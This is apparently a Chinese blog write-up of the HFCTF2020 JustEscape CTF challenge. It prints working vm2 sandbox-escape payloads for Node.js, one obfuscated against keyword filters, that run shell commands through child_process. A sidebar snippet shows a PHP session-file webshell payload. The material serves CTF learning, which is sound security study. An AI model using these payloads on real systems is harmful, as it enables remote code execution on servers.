[HFCTF2020]JustEscape

最新推荐文章于 2024-03-25 23:25:25 发布
原创 最新推荐文章于 2024-03-25 23:25:25 发布 · 403 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文探讨了如何通过Node.js中VM模块的异常处理进行代码注入,展示了如何利用VM逃逸技术,并提供了相应的防御策略。重点在于理解错误堆栈和代码执行的原理,以及如何避免此类安全问题。

考点 :nodejs vm逃逸

没学过先做个记录
在这里插入图片描述
wappalyzer 检测出 php 和 nodejs,居然都自爆不是PHP了,那就试试是不是 nodejs
在这里插入图片描述
让他异常 /run.php?code=Error().stack

Error
    at vm.js:1:1
    at Script.runInContext (vm.js:131:20)
    at VM.run (/app/node_modules/vm2/lib/main.js:219:62)
    at /app/server.js:51:33
    at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)
    at next (/app/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/app/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5)
    at /app/node_modules/express/lib/router/index.js:281:22
    at Function.process_params (/app/node_modules/express/lib/router/index.js:335:12)

VM逃逸 payload

"use strict";
const {VM} = require('vm2');
const untrusted = '(' + function(){
    TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor("return process")();
    try{
        Object.preventExtensions(Buffer.from("")).a = 1;
    }catch(e){
        return e.get_process(()=>{}).mainModule.require("child_process").execSync("whoami").toString();
    }
}+')()';
try{
    console.log(new VM().run(untrusted));
}catch(x){
    console.log(x);
}

(function (){
    TypeError[`${`${`prototyp`}e`}`][`${`${`get_proces`}s`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return this.proces`}s`}`)();
    try{
        Object.preventExtensions(Buffer.from(``)).a = 1;
    }catch(e){
        return e[`${`${`get_proces`}s`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
    }
})()

在这里插入图片描述
关键字都做了格式替换,也不懂是换成了什么,害我好菜

prototyp  => [`${`${`prototyp`}e`}`]
get_process => [`${`${`get_proces`}s`}`]
require => [`${`${`requir`}e`}`]
child_process => `${`${`child_proces`}s`}`
execSync => [`${`${`exe`}cSync`}`]

大概这么个意思
BUUCTF-[HFCTF2020]JustEscape
qq_24033605的博客
11-04 683
[HFCTF2020]JustEscape 题目说真的不是PHP吗? 十有八九不是,猜测可能是Java,结果是js。 用Error().stack,看一下报错信息。 报错显示是vm.js,考的vm沙箱逃逸。 POC参考: https://github.com/patriksimek/vm2/issues/225 payload1: (function (){ TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`$
[HFCTF2020]EasyLogin 1
ubaichu的博客
10-10 984
[HFCTF2020]EasyLogin 1 题目解析
[HFCTF2020]BabyUpload session解析引擎
qq_54929891的博客
07-05 1472
对于代码的解析如上,获取flag的途径:1、session中的username参数要为admin2、在 /var/babyctf/success.txt存在在代码审查中可以得到的信息点: 在php中,session文件默认的存储文件名是sess_PHPSESSID,于是我们可以利用donwnload先看一下原先的session文件里面有什么,经过分析可以知道$attr参数我们可以暂时设置为空,因为目前感觉跟我们的操作没多大关系 可以发现有一个不可见字符,不同的php引擎,session的存储方式不一
BUUCTF刷题记录[HFCTF2020]BabyUpload——涉及session反序列化
u013119911的博客
06-30 1759
点开就是源代码,直接进行代码审计
[HFCTF2020]JustEscape 记录
m0_63045593的博客
04-20 222
<?php if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) { $code = $_GET['code']; echo eval(code); } else { highlight_file(__FILE__); } ?> 输入Error().stack猜测是不是js 是VM2沙盒逃逸用payload直接打 (function (){ TypeError[`
第 五 周 write up [[HFCTF2020]JustEscape [BJDCTF2020]EasySearch HCTF-2018-Web-warmup]
tothemoon的博客
10-22 1974
我的博客:[http://tothemoon2019.github.io](https://tothemoon2019.github.io/2020/10/21/%E7%AC%AC%20%E4%BA%94%20%E5%91%A8%20write%20up%20%5B%5BHFCTF2020%5DJustEscape%5D/) 文章目录[HFCTF2020]JustEscape(VM沙箱逃逸)0x000x0112success[BJDCTF2020]EasySearch(shtml,ssi注入)ssi注入su
编译器前端cpp示例代码
11-19
编译器前端cpp示例代码编译器前端cpp示例代码编译器前端cpp示例代码编译器前端cpp示例代码编译器前端cpp示例代码
[HFCTF2020]JustEscape vm沙箱逃逸
scrawman的博客
11-29 746
[HFCTF2020]JustEscape 先用Error().stack测试一下,确定是vm.js 这个老哥写的沙箱逃逸https://github.com/patriksimek/vm2/issues/225 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ TypeError.prototype.get_process = f=>f.constructor("return proces
Nodejs沙盒逃逸
2202_75361164的博客
03-25 1194
Nodejs沙盒逃逸
node.js--vm沙箱逃逸初探
m0_62422842的博客
01-04 2552
前几天遇到一个考察vm沙箱逃逸的题目,由于这个点是第一次听说,所以就花时间了解了解什么是沙箱逃逸。此篇文章是对于自己初学vm沙箱逃逸的学习记录,若记录知识有误,欢迎师傅们指正。就只针对于node.js而言,沙箱和docker容器其实是差不多的,都是将程序与程序之间,程序与主机之间互相分隔开,但是沙箱是为了隔离有害程序的,避免影响到主机环境。为什么node.js语言要引入沙箱,这就要说说js语言中的作用域(也叫上下文)。------->输出undefined-------->输出100。
HFCTF2020 web writeup
a3320315的博客
04-21 3226
easy_login just_escape 进入这个页面 然后显示的是一个php的任意代码执行的页面,但是经过测试,这个根本就是php,其实题目也有提示 我们输入Error().stack 可以根据回显得到,这是一个JS的vm2,而且经过测试许多关键字都被过滤 所以我们使用字符串拼接就可以了~~ 然后我们去网上找一下关于vm2的payload 所以最终的payload为: (function (...
BUU CTF web(四)
0xdawn的博客
05-11 8184
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
WUST-CTF 2020 WriteUp
weixin_45883223的博客
03-30 3691
WUST-CTF 2020 WriteUp前言WebcheckinadminCV Maker朴实无华Crypto大数运算情书B@sebabyrsa佛说:只能四天MiscSpace ClubWelcome爬Find megirlfriendShopReverseCr0ssFunlevel1 前言 又一次被“面向萌新,题目友好”给骗了,我还是tcl。 Web checkin 打开链接发现要提交作者的名...
[HFCTF2020]BabyUpload
最新发布
01-11
### HFCTF2020 BabyUpload Challenge Writeup 对于HFCTF2020中的BabyUpload挑战,该题目设计围绕着Web应用安全展开。由于此题不存在任何会话(session)复制的风险点,攻击者可以考虑通过上传特定构造的`sess_xxxxxxxx`文件来覆盖已有的会话文件[^2]。 #### 利用PHP Session机制实现漏洞利用 在PHP环境中,当应用程序允许用户控制部分输入并将其存储于session数据中时,则可能存在安全隐患。如果能够找到一种方法绕过常规的文件上传限制并将恶意创建的`.php`脚本作为合法的session文件提交给服务器端处理路径下,那么就有可能执行任意代码。 具体到BabyUpload这个案例里: - 攻击面在于可被操控的文件名以及内容; - 关键在于理解如何巧妙地构造payload使得其既能满足服务端验证逻辑又能成功触发预期之外的行为; 为了达成目标,参与者通常需要深入研究目标平台使用的框架版本及其默认配置细节,寻找可能存在的弱点或未公开特性加以利用。 ```python # Python伪代码展示概念性的Payload构建过程 import base64 def create_malicious_session_data(): payload = "<?php system($_GET['cmd']); ?>" encoded_payload = base64.b64encode(payload.encode()).decode() session_content = f"_SESSION[a]=O:8:\"stdClass\":1:{{s:4:\"data\";C:7:\"Closure\":35:{{ s:7:\"handler\";a:3:{{i:0;i:1;i:1;s:9:\"eval(base64_decode('{encoded_payload}'));\";i:2;i:3;}} }}}}" with open('sess_babyupload', 'w') as file: file.write(session_content) create_malicious_session_data() ``` 上述Python代码片段仅用于说明目的,并不构成实际可用的exploit工具。它展示了怎样编码一个简单的反序列化对象注入payload,其中包含了base64加密后的命令执行字符串。 一旦这样的特殊格式化的session文件被放置到了适当的位置并且由易受攻击的应用程序加载之后,就可以远程指令服务器运行指定的操作系统级命令了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值